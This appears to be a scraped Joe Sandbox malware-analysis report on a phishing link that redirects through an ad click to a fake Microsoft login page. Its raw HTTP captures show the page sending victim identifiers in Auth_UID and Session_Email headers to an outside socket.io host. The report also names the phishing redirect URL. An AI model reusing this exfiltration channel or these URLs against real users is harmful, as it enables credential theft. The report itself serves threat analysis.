/html{box-sizing:border-box},:before,:after{box-sizing:inherit}/* Extract from normalize.css by Nicolas Gallagher and Jonathan Neal git.io/normalize */html{-ms-text-size-adjust:100%;-web
2024-11-07 20:04:44 UTC	7044	IN	Data Raw: 21 69 6d 70 6f 72 74 61 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 62 63 64 34 21 69 6d 70 6f 72 74 61 6e 74 7d 0a 2e 77 33 2d 62 6c 75 65 2d 67 72 65 79 2c 2e 77 33 2d 68 6f 76 65 72 2d 62 6c 75 65 2d 67 72 65 79 3a 68 6f 76 65 72 2c 2e 77 33 2d 62 6c 75 65 2d 67 72 61 79 2c 2e 77 33 2d 68 6f 76 65 72 2d 62 6c 75 65 2d 67 72 61 79 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 36 30 37 64 38 62 21 69 6d 70 6f 72 74 61 6e 74 7d 0a 2e 77 33 2d 67 72 65 65 6e 2c 2e 77 33 2d 68 6f 76 65 72 2d 67 72 65 65 6e 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 Data Ascii: !important;background-color:#00bcd4!important}.w3-blue-grey,.w3-hover-blue-grey:hover,.w3-blue-gray,.w3-hover-blue-gray:hover{color:#fff!important;background-color:#607d8b!important}.w3-green,.w3-hover-green:hover{color:#fff!important;background-color:#

Timestamp	Bytes transferred	Direction	Data
2024-11-07 20:04:44 UTC	418	OUT	GET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1 Host: aadcdn.msauth.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-07 20:04:45 UTC	779	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 20:04:44 GMT Content-Type: image/svg+xml Content-Length: 1435 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Wed, 24 May 2023 10:11:48 GMT ETag: 0x8DB5C3F4911527F x-ms-request-id: 2da9535b-901e-0071-795b-3052c2000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20241107T200444Z-17df447cdb5wrr5fhC1DFWte8n000000053000000000dgck x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 20:04:45 UTC	1435	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 bd 57 4d 6f 1c 37 0c fd 2b 8b ed 75 56 96 48 4a a2 0a db 80 7b f2 c1 be fa 90 db b6 b1 b3 06 ec 26 88 17 76 fa ef fb 28 51 b3 46 91 a2 c9 a5 b0 f7 61 57 1c 51 fc 7c e2 9c bf bc 7e da 7c 7b 7e fa f3 e5 62 7b 38 1e bf fc 7a 76 f6 f6 f6 16 de 38 7c fe fa e9 8c 62 8c 67 78 62 bb 79 7b fc 78 3c 5c 6c 53 d4 ed e6 70 ff f8 e9 70 bc d8 92 6c 37 af 8f f7 6f bf 7d fe 76 b1 8d 9b b8 81 74 83 c5 cb f3 e3 e3 f1 e9 fe 72 ff f2 72 7f 7c 39 3f 1b bf ce bf ec 8f 87 cd c7 8b ed ad 48 50 2e 8b 84 72 97 34 c8 61 47 41 ee 6a c8 ca d7 82 af 37 ac 21 a5 b6 98 ec 9a 4b c8 9c 6e 98 42 12 5a fa 43 87 5d 88 d4 fa d6 6b 6a a1 dd 41 d1 81 83 70 b9 e1 1a 78 49 a6 fe 10 62 d6 1b 49 21 4b b6 93 3e 3c d3 92 42 94 b6 4f 81 8a 2e 03 23 fe d2 12 24 b5 5d 68 a5 Data Ascii: WMo7+uVHJ{&v(QFaWQ\|~\|{~b{8zv8\|bgxby{x<\lSppl7o}vtrr\|9?HP.r4aGAj7!KnBZC]kjApxIbI!K><BO.#$]h

Timestamp	Bytes transferred	Direction	Data
2024-11-07 20:04:44 UTC	649	OUT	GET /shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1 Host: logincdn.msauth.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://carolyndc.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-07 20:04:45 UTC	799	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 20:04:45 GMT Content-Type: image/svg+xml Content-Length: 276 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Wed, 22 Jan 2020 00:38:00 GMT ETag: 0x8D79ED35591CF44 x-ms-request-id: 8464d3b8-201e-0031-7a13-312245000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20241107T200445Z-15869dbbcc62nmdhhC1DFWg2r400000001wg00000000ak4x x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 20:04:45 UTC	276	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 95 51 3d 6f c3 20 10 fd 2b 88 ae e6 e0 08 d8 b8 b2 3d 74 ca 90 ae 1d ba 45 8a 6b 5b 22 1f aa 91 c9 cf 2f 67 3b 6e 87 2c 15 f0 80 bb 7b ef 9e a0 1a a7 8e dd cf fe 32 d6 bc 0f e1 f6 2a 65 8c 11 e2 0e ae df 9d d4 4a 29 99 2a 38 8b c3 29 f4 35 d7 86 b3 be 1d ba 3e 2c e7 69 68 e3 db f5 5e 73 c5 14 d3 26 4d de 54 61 08 be 6d 8e e3 d8 86 b1 92 cb ad ba 1d 43 cf 4e 35 7f 47 97 21 82 2d dc 04 ce 98 7d 01 39 16 7e 07 a5 c6 8c d0 09 b0 a5 a1 75 c8 33 d4 de 40 69 8c 98 71 4b cc 9c 55 e5 93 b3 af c1 fb 9a bf 18 45 83 cb bf bd 14 f1 b2 02 94 cd fd 53 fa 1e ff ef e3 ac 04 a0 41 01 aa c0 b4 0e 36 95 97 a4 47 9b 05 67 1d 11 d6 2c 66 33 67 c1 35 46 1b b1 49 9d da d8 47 40 3c 0e 98 4c 2e 3a 60 b5 4e 26 01 3f 52 03 93 0c cf 89 64 b4 b0 28 08 37 Data Ascii: Q=o +=tEk["/g;n,{2eJ)8)5>,ih^s&MTamCN5G!-}9~u3@iqKUESA6Gg,f3g5FIG@<L.:`N&?Rd(7

Timestamp	Bytes transferred	Direction	Data
2024-11-07 20:04:45 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-11-07 20:04:45 UTC	514	IN	HTTP/1.1 200 OK ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (lpl/EF06) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-weu-z1 Cache-Control: public, max-age=39596 Date: Thu, 07 Nov 2024 20:04:45 GMT Content-Length: 55 Connection: close X-CID: 2
2024-11-07 20:04:45 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Timestamp	Bytes transferred	Direction	Data
2024-11-07 20:04:47 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=1xe5ulvNlDKvPlK&MD=7mbNbYNh HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-11-07 20:04:47 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: 7b2788fb-a497-49ac-8e51-1bccdc751a14 MS-RequestId: c39ceff6-163f-436c-96a1-f0d00418797c MS-CV: M8/xi6PyYEW6BeS4.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Thu, 07 Nov 2024 20:04:47 GMT Connection: close Content-Length: 24490
2024-11-07 20:04:47 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-11-07 20:04:47 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Timestamp	Bytes transferred	Direction	Data
2024-11-07 20:05:02 UTC	553	OUT	OPTIONS /socket.io/?EIO=4&transport=polling&t=PC8El5Y HTTP/1.1 Host: drensyoons1sedt.com Connection: keep-alive Accept: / Access-Control-Request-Method: GET Access-Control-Request-Headers: auth_uid,session_email Origin: https://carolyndc.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site Sec-Fetch-Dest: empty Referer: https://carolyndc.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-07 20:05:02 UTC	912	IN	HTTP/1.1 204 No Content Date: Thu, 07 Nov 2024 20:05:02 GMT Content-Length: 0 Connection: close Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE Vary: Access-Control-Request-Headers Access-Control-Allow-Headers: auth_uid,session_email cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qKt4UPaOjrxNwxLJ5%2FBu5nxX9zj9sRkhTZFEL3F%2FvJHdPn8gtanckvGKppCd8tTcDuCrXUiSc3RlZCXuOqnQ%2F%2BKzyJqdhvfsVf9umDUavzcofKU2rTudE1h6jf3BjYJUctyDOHSO"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8defef9468cdcb75-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1556&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=1131&delivery_rate=1750906&cwnd=183&unsent_bytes=0&cid=090e564b3d2d7fc6&ts=163&x=0"

Timestamp	Bytes transferred	Direction	Data
2024-11-07 20:05:03 UTC	654	OUT	GET /socket.io/?EIO=4&transport=polling&t=PC8El5Y HTTP/1.1 Host: drensyoons1sedt.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Accept: / Auth_UID: USER14109p24U14101457 Session_Email: realuser@fake.com sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: https://carolyndc.com Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://carolyndc.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-07 20:05:03 UTC	822	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 20:05:03 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 118 Connection: close Access-Control-Allow-Origin: * cache-control: no-store cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o3ygbODTXEFG1UPn8XZNR%2FEFBBjB9NzTtGjtiDUH0%2BI2v79LfDjFWgXruFQ06g0OeCx5OgmlnhiwyX%2BK8k8VAhtJoP%2BPWLIg8CCussCzPwMModIs%2BexzE%2FVbtqlE4DxWbtG40uX5"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8defef993fd14780-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1212&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=1232&delivery_rate=2492254&cwnd=250&unsent_bytes=0&cid=6d9bc251bbefcbad&ts=181&x=0"
2024-11-07 20:05:03 UTC	118	IN	Data Raw: 30 7b 22 73 69 64 22 3a 22 39 61 79 52 6d 32 50 43 7a 64 68 4a 45 6c 65 75 41 42 61 6e 22 2c 22 75 70 67 72 61 64 65 73 22 3a 5b 22 77 65 62 73 6f 63 6b 65 74 22 5d 2c 22 70 69 6e 67 49 6e 74 65 72 76 61 6c 22 3a 32 35 30 30 30 2c 22 70 69 6e 67 54 69 6d 65 6f 75 74 22 3a 32 30 30 30 30 2c 22 6d 61 78 50 61 79 6c 6f 61 64 22 3a 31 30 30 30 30 30 30 7d Data Ascii: 0{"sid":"9ayRm2PCzdhJEleuABan","upgrades":["websocket"],"pingInterval":25000,"pingTimeout":20000,"maxPayload":1000000}

Timestamp	Bytes transferred	Direction	Data
2024-11-07 20:05:04 UTC	579	OUT	OPTIONS /socket.io/?EIO=4&transport=polling&t=PC8ElUl&sid=9ayRm2PCzdhJEleuABan HTTP/1.1 Host: drensyoons1sedt.com Connection: keep-alive Accept: / Access-Control-Request-Method: POST Access-Control-Request-Headers: auth_uid,session_email Origin: https://carolyndc.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site Sec-Fetch-Dest: empty Referer: https://carolyndc.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-07 20:05:04 UTC	910	IN	HTTP/1.1 204 No Content Date: Thu, 07 Nov 2024 20:05:04 GMT Content-Length: 0 Connection: close Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE Vary: Access-Control-Request-Headers Access-Control-Allow-Headers: auth_uid,session_email cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3rrfqC0wqnybNhy4A8HSXcbLY3ZOh74F2nGNQRxf6Q%2BW%2BLYR08yvjuANeLu9VW6hOzx6XZZzBhegnYPQoxz5alrkyb3sHUiP1lbDxloD%2BxmNfUKkO0LMnneGQ2FMMAAHzud5SIcm"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8defef9e1c0bcb75-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1169&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=1157&delivery_rate=2352558&cwnd=183&unsent_bytes=0&cid=fa08aa0a0d203228&ts=150&x=0"

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report https://ad.broadstreetads.com/click/808995/c536057/z64631?destination=https://carolyndc.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVJFVXiaMUE9JnVpZD1VU0VSMTQxMDlwMjRVMTQxMDE0NTc=N0123N

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

HTML

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Networking

System Summary

Boot Survival

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Chrome Cache Entry: 67

Chrome Cache Entry: 68

Chrome Cache Entry: 69

Chrome Cache Entry: 70

Chrome Cache Entry: 71

Chrome Cache Entry: 72

Chrome Cache Entry: 73

Chrome Cache Entry: 74

Chrome Cache Entry: 75

Chrome Cache Entry: 76

Chrome Cache Entry: 77

Chrome Cache Entry: 78

Chrome Cache Entry: 79

Chrome Cache Entry: 80

Chrome Cache Entry: 81

Chrome Cache Entry: 82

Chrome Cache Entry: 83

Chrome Cache Entry: 84

Chrome Cache Entry: 85

Windows Analysis Report
https://ad.broadstreetads.com/click/808995/c536057/z64631?destination=https://carolyndc.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVJFVXiaMUE9JnVpZD1VU0VSMTQxMDlwMjRVMTQxMDE0NTc=N0123N

Timestamp	Bytes transferred	Direction	Data
2024-11-07 20:05:04 UTC	578	OUT	OPTIONS /socket.io/?EIO=4&transport=polling&t=PC8ElUm&sid=9ayRm2PCzdhJEleuABan HTTP/1.1 Host: drensyoons1sedt.com Connection: keep-alive Accept: / Access-Control-Request-Method: GET Access-Control-Request-Headers: auth_uid,session_email Origin: https://carolyndc.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site Sec-Fetch-Dest: empty Referer: https://carolyndc.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-07 20:05:23 UTC	913	IN	HTTP/1.1 204 No Content Date: Thu, 07 Nov 2024 20:05:23 GMT Content-Length: 0 Connection: close Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE Vary: Access-Control-Request-Headers Access-Control-Allow-Headers: auth_uid,session_email cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TRuM2neptBFffVVLqb2cioJ%2FrYj2DgJtFAik7eOalf4Ea2DQLRqwyqzFJH51BDNSmtfkbBDFJ13aAHEGx%2F0C9ODTrpvAxLW%2FbvIiIcFLSQun3Ts3sqoN2M0dy6UrWkjrd9KmS7S%2F"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8defef9e6896e73f-DEN alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=19018&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=1156&delivery_rate=150982&cwnd=32&unsent_bytes=0&cid=22dea460636d04e0&ts=19509&x=0"

Timestamp	Bytes transferred	Direction	Data
2024-11-07 20:05:04 UTC	557	OUT	GET /socket.io/?EIO=4&transport=websocket&sid=9ayRm2PCzdhJEleuABan HTTP/1.1 Host: drensyoons1sedt.com Connection: Upgrade Pragma: no-cache Cache-Control: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Upgrade: websocket Origin: https://carolyndc.com Sec-WebSocket-Version: 13 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Sec-WebSocket-Key: GoMNte9BqN8+sPHS0Wym4g== Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
2024-11-07 20:05:04 UTC	801	IN	HTTP/1.1 400 Bad Request Date: Thu, 07 Nov 2024 20:05:04 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: * cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=afTQfD7x0MoYz68Vy9c4T42gyV1oiaR%2FgpQayN%2Bh7KBVK%2FM4MblvCqLBBvb0Qg3RgrDZd6KnLJEf52R%2Fj8Id7qBGCnM0oWMqnCT8LOm8nlC3%2BSawoFzCsJ2tYMT3BFV94zeo2iqH"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8defef9e5b90e773-DEN alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=19383&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=1118&delivery_rate=135567&cwnd=32&unsent_bytes=0&cid=b011738a455f2256&ts=200&x=0"
2024-11-07 20:05:04 UTC	40	IN	Data Raw: 32 32 0d 0a 7b 22 63 6f 64 65 22 3a 33 2c 22 6d 65 73 73 61 67 65 22 3a 22 42 61 64 20 72 65 71 75 65 73 74 22 7d 0d 0a Data Ascii: 22{"code":3,"message":"Bad request"}
2024-11-07 20:05:04 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-11-07 20:05:04 UTC	387	OUT	GET /socket.io/?EIO=4&transport=polling&t=PC8El5Y HTTP/1.1 Host: drensyoons1sedt.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-07 20:05:05 UTC	819	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 20:05:05 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 118 Connection: close Access-Control-Allow-Origin: * cache-control: no-store cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0wZx7Tpy8jVTk%2BsyXDfSwp4ffHPc6pwM6rlGloKH%2F3h4nLa7I59ry48oCpCafjtGtEp%2FMLS4gFY33V7WpDO00ZcWsdCyMyGw24AK%2BPQw9HZQmovWowP7fIUQd9Ja%2FDxIlN0pifmv"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8defefa238ea2d29-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1832&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=965&delivery_rate=1722784&cwnd=243&unsent_bytes=0&cid=5beada5396e4d953&ts=164&x=0"
2024-11-07 20:05:05 UTC	118	IN	Data Raw: 30 7b 22 73 69 64 22 3a 22 4f 68 52 45 53 34 74 42 71 67 49 32 35 37 43 5f 41 42 61 6f 22 2c 22 75 70 67 72 61 64 65 73 22 3a 5b 22 77 65 62 73 6f 63 6b 65 74 22 5d 2c 22 70 69 6e 67 49 6e 74 65 72 76 61 6c 22 3a 32 35 30 30 30 2c 22 70 69 6e 67 54 69 6d 65 6f 75 74 22 3a 32 30 30 30 30 2c 22 6d 61 78 50 61 79 6c 6f 61 64 22 3a 31 30 30 30 30 30 30 7d Data Ascii: 0{"sid":"OhRES4tBqgI257C_ABao","upgrades":["websocket"],"pingInterval":25000,"pingTimeout":20000,"maxPayload":1000000}

Timestamp	Bytes transferred	Direction	Data
2024-11-07 20:05:05 UTC	739	OUT	POST /socket.io/?EIO=4&transport=polling&t=PC8ElUl&sid=9ayRm2PCzdhJEleuABan HTTP/1.1 Host: drensyoons1sedt.com Connection: keep-alive Content-Length: 2 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Auth_UID: USER14109p24U14101457 sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-type: text/plain;charset=UTF-8 Accept: / Session_Email: realuser@fake.com sec-ch-ua-platform: "Windows" Origin: https://carolyndc.com Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://carolyndc.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-07 20:05:05 UTC	2	OUT	Data Raw: 34 30 Data Ascii: 40
